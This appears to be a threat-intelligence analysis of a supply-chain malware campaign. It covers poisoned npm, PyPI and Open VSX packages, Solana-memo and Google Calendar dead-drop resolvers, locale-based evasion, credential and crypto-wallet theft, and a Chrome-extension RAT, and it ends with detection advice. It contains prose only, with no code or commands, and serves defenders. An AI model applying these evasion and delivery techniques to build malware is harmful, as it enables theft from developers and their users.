Infrastructure and Dead‑Drop Mechanism
The adversary exploits Solana transaction memos as a dead‑drop channel, embedding a C2 address that resolves to a remote server. This resolver bypasses typical network monitoring by using blockchain immutability, forcing defenders to inspect ledger entries for anomalies. The payload URL is concealed within a memo field, making static analysis of network traffic insufficient.
Operators also use a public Google Calendar event as a secondary resolver, pulling the RAT binary from a URL that appears benign. The calendar entry contains an encrypted string that, once decoded, points to the malicious host, complicating detection by endpoint firewalls that trust calendar traffic. This dual‑resolver design creates a resilient command path that survives partial takedown attempts.
Supply‑Chain Infection Vectors
Initial foothold is achieved by publishing malicious packages to npm, PyPI, and Open VSX, each masquerading as legitimate libraries. The packages embed a post‑install script that fetches the first stage binary, ensuring execution on developer machines during dependency resolution. Compromise of maintainer accounts enables push of poisoned updates, expanding reach to downstream projects.
To avoid detection in environments with a Russian locale, the installer checks system language settings and aborts if a match is found, a simple yet effective evasion technique. This conditional logic reduces noise in target regions, aligning the campaign with geopolitical considerations without overtly revealing intent.
Multi‑Stage Payload Architecture
Stage one delivers a lightweight downloader that contacts the Solana memo, retrieves a compressed ZIP archive, and extracts a second‑stage datatheft framework. The framework enumerates system details, harvests credential stores, and captures cryptocurrency wallet files, then recompresses data for exfiltration. Exfiltration occurs over HTTPS to a hard‑coded endpoint, blending with legitimate traffic patterns.
After exfiltration, the framework triggers retrieval of two additional components: a .NET binary designed for hardware wallet phishing and a JavaScript‑based RAT that injects a malicious Chrome extension. The .NET component uses WMI queries to detect attached USB devices, enabling selective credential capture when a hardware wallet is present.
RAT Deployment via Chrome Extension
The JavaScript RAT masquerades as an offline Google Docs viewer, requesting elevated browser permissions to log keystrokes, dump cookies, and capture session tokens. It also records screenshot data and forwards commands from the hidden C2, allowing attackers to execute arbitrary JavaScript in the victims context. The extensions manifest is signed with a legitimate developer key, bypassing store verification.
Communication with the C2 uses WebSocket over port 443, encapsulating command traffic within standard TLS streams. This design defeats many network‑based intrusion detection signatures that rely on known RAT protocols, forcing defenders to rely on behavior‑based heuristics.
Detection and Response Recommendations
Security teams should implement provenance checks on package installations, verifying author signatures against known identities before accepting updates. Monitoring for anomalous Solana transaction patterns associated with internal IP addresses can reveal hidden dead‑drop activity. Endpoint telemetry should flag processes that invoke WMI queries targeting USB enumeration without a legitimate business case.
Deploying browser integrity controls that restrict unsigned extensions, especially those requesting access to cookies or clipboard, reduces the attack surface. Finally, integrating blockchain analytics into SOC workflows enables correlation of ledger events with internal alerts, providing early warning of emerging supply‑chain threats.